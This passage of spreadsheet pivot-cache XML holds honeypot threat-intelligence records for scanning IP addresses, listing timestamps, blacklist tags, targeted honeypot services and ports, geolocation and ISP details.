    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="30"/>
    <s v="Wakayama"/>
    <s v="Wakayama Shi"/>
    <s v="Wakayama"/>
    <s v="1926004"/>
    <s v="640-0000"/>
    <s v="34.2304"/>
    <s v="135.171"/>
    <s v="4713"/>
    <s v="NTT Communications Corporation"/>
    <s v="NTT Communications Corporation"/>
    <s v="business"/>
    <s v="NTT Communications Corporation"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b430:e906"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1998"/>
    <x v="1998"/>
    <s v="184-175-61-39.dsl.teksavvy.com&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-13T14:11:25"/>
    <d v="2025-02-25T04:11:21"/>
    <d v="2025-04-13T14:11:25"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="CA"/>
    <s v="Canada"/>
    <s v="ON"/>
    <s v="Ontario"/>
    <s v="Toronto"/>
    <s v="Toronto"/>
    <s v="6167865"/>
    <s v="M5A"/>
    <s v="43.6532"/>
    <s v="-79.3832"/>
    <s v="5645"/>
    <s v="TekSavvy Solutions, Inc."/>
    <s v="TekSavvy Solutions, Inc."/>
    <s v="residential"/>
    <s v="TekSavvy Solutions, Inc."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b8af:3d27"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1999"/>
    <x v="1999"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T14:04:45"/>
    <d v="2024-02-26T15:41:06"/>
    <d v="2025-04-13T14:04:45"/>
    <n v="46"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_SSH_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;38455&amp;&amp;22&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="HN"/>
    <s v="Honduras"/>
    <s v="FM"/>
    <s v="Francisco Morazán Department"/>
    <s v="Distrito Central"/>
    <s v="Tegucigalpa (Colonia Florencia Norte)"/>
    <s v="3600949"/>
    <s v="11101"/>
    <s v="14.0867"/>
    <s v="-87.1742"/>
    <s v="23383"/>
    <s v="METRORED S.A. DE C.V."/>
    <s v="Metrored S.a. De C.V."/>
    <s v="business"/>
    <s v="Navega.com Honduras"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:be6d:ca06"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2000"/>
    <x v="2000"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T13:29:26"/>
    <d v="2025-04-13T10:03:53"/>
    <d v="2025-04-13T13:29:26"/>
    <n v="57"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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business"/>
    <s v="NA"/>
    <s v="2004-09-06"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b5b:fc1c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2001"/>
    <x v="2001"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T12:29:16"/>
    <d v="2024-12-29T06:13:55"/>
    <d v="2025-04-13T12:29:16"/>
    <n v="29"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="1433&amp;&amp;445&amp;&amp;58659&amp;&amp;59578&amp;&amp;50907"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']}"/>
    <n v="28"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TN"/>
    <s v="Tamil Nadu"/>
    <s v="Villupuram"/>
    <s v="Auroville"/>
    <s v="6620455"/>
    <s v="605101"/>
    <s v="12.0376"/>
    <s v="79.7545"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="business"/>
    <s v="Sattva Hitech and Conware Pvt Limited"/>
    <s v="1999-03-16"/>
    <s v="SattvaHitech"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (210.212.230.13,49514)}&amp;&amp;{Data_SMB:Incoming connection (210.212.230.13,50299)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (210.212.230.13,55217)}&amp;&amp;{Data_SMB:Incoming connection (210.212.230.13,56298)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d2d4:e60d"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2002"/>
    <x v="2002"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T12:18:02"/>
    <d v="2024-04-07T10:13:00"/>
    <d v="2025-04-13T12:18:02"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="2444&amp;&amp;23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="BA"/>
    <s v="Bahia"/>
    <s v="Cachoeira Municipality"/>
    <s v="Cachoeira"/>
    <s v="3468535"/>
    <s v="NA"/>
    <s v="-12.6014"/>
    <s v="-38.9658"/>
    <s v="266401"/>
    <s v="CNA NET"/>
    <s v="CNA NET"/>
    <s v="business"/>
    <s v="CNA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None&amp;&amp;connection"/>
    <s v="None&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:aa51:3e57"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2003"/>
    <x v="2003"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T11:53:39"/>
    <d v="2025-04-13T11:53:39"/>
    <d v="2025-04-13T11:53:39"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="corporate"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d0:df22"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2004"/>
    <x v="2004"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T11:44:38"/>
    <d v="2025-04-13T11:30:07"/>
    <d v="2025-04-13T11:44:38"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_POSTGRES_HC1&amp;&amp;SMA-LAB_SOCKS5_H4"/>
    <s v="5432&amp;&amp;1080"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="Hoan Kiem"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="24086"/>
    <s v="Viettel Corporation"/>
    <s v="Viettel Corporation"/>
    <s v="business"/>
    <s v="Viettel Group"/>
    <s v="2007-05-18"/>
    <s v="VIETTEL-VN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_POSTGRES:NA}&amp;&amp;{Data_SOCKS5:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7467:dbab"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2005"/>
    <x v="2005"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T11:43:39"/>
    <d v="2025-04-13T11:43:39"/>
    <d v="2025-04-13T11:43:39"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Block N)"/>
    <s v="1261481"/>
    <s v="110001"/>
    <s v="28.6309"/>
    <s v="77.2229"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="BSNL Internet"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f2:cdcb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2006"/>
    <x v="2006"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T11:37:09"/>
    <d v="2025-04-13T11:37:09"/>
    <d v="2025-04-13T11:37:09"/>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dc:1498"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2007"/>
    <x v="2007"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T11:36:29"/>
    <d v="2024-05-22T19:21:06"/>
    <d v="2025-04-13T11:36:29"/>
    <n v="94"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_MSSQL_H36"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;5486&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JB"/>
    <s v="West Java"/>
    <s v="Cirebon Regency"/>
    <s v="Sumber"/>
    <s v="1626183"/>
    <s v="NA"/>
    <s v="-6.79595"/>
    <s v="108.442"/>
    <s v="149930"/>
    <s v="PT Replay Inti Media"/>
    <s v="PT Replay Inti Media"/>
    <s v="business"/>
    <s v="PT Replay Inti Media"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,65121)}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,49416)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,49384)}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,49768)}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,52738)}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,53416)}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,64980)}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,49360)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,52847)}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,53390)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,55569)}&amp;&amp;{Data_SMB:Incoming connection (103.191.218.153,56170)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67bf:da99"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2008"/>
    <x v="2008"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T11:10:20"/>
    <d v="2025-03-30T22:12:15"/>
    <d v="2025-04-13T11:10:20"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KW"/>
    <s v="Kuwait"/>
    <s v="KU"/>
    <s v="Al Asimah"/>
    <s v="NA"/>
    <s v="Kuwait City (Jibla)"/>
    <s v="285787"/>
    <s v="NA"/>
    <s v="29.3716"/>
    <s v="47.9736"/>
    <s v="42961"/>
    <s v="Mobile Telecommunications Company"/>
    <s v="Mobile Telecommunications Company"/>
    <s v="cellular"/>
    <s v="Zain Mobile Connectivity Services"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2525:cf59"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2009"/>
    <x v="2009"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T10:51:21"/>
    <d v="2025-02-28T17:35:46"/>
    <d v="2025-04-13T10:51:21"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="BT"/>
    <s v="Bhutan"/>
    <s v="15"/>
    <s v="Thimphu District"/>
    <s v="NA"/>
    <s v="Thimphu"/>
    <s v="1252416"/>
    <s v="NA"/>
    <s v="27.4716"/>
    <s v="89.6386"/>
    <s v="18024"/>
    <s v="Bhutan Telecom Ltd"/>
    <s v="Bhutan Telecom Ltd"/>
    <s v="cellular"/>
    <s v="Druknet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7702:7b62"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2010"/>
    <x v="2010"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T10:46:01"/>
    <d v="2025-04-13T10:46:01"/>
    <d v="2025-04-13T10:46:01"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MY"/>
    <s v="Malaysia"/>
    <s v="14"/>
    <s v="Kuala Lumpur"/>
    <s v="WP. Kuala Lumpur"/>
    <s v="Kuala Lumpur (Kampung Attap)"/>
    <s v="1735161"/>
    <s v="50460"/>
    <s v="3.13725"/>
    <s v="101.693"/>
    <s v="4788"/>
    <s v="TTSSB-MY"/>
    <s v="Tm Technology Services Sdn Bhd"/>
    <s v="consumer"/>
    <s v="Adsl Streamyx"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:af88:471c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2011"/>
    <x v="2011"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T10:38:56"/>
    <d v="2025-04-13T10:38:56"/>
    <d v="2025-04-13T10:38:56"/>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dd:ca7c"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2012"/>
    <x v="2012"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T10:38:08"/>
    <d v="2025-04-13T10:38:08"/>
    <d v="2025-04-13T10:38:08"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>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f1:783"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2013"/>
    <x v="2013"/>
    <s v="NA&amp;&amp;125-228-169-56.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-13T10:10:24"/>
    <d v="2025-03-11T19:59:57"/>
    <d v="2025-04-13T10:10:24"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46"/>
    <s v="23&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de4:a938"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="2014"/>
    <x v="2014"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-13T09:44:42"/>
    <d v="2024-07-08T09:24:00"/>
    <d v="2025-04-13T09:44:42"/>
    <n v="72"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_IRC_H47&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_HTTPS_H33&amp;&amp;SMA-LAB_HTTPS_H14"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;37161&amp;&amp;389&amp;&amp;1433&amp;&amp;6667&amp;&amp;54624&amp;&amp;443&amp;&amp;80&amp;&amp;54449&amp;&amp;55929"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="True"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
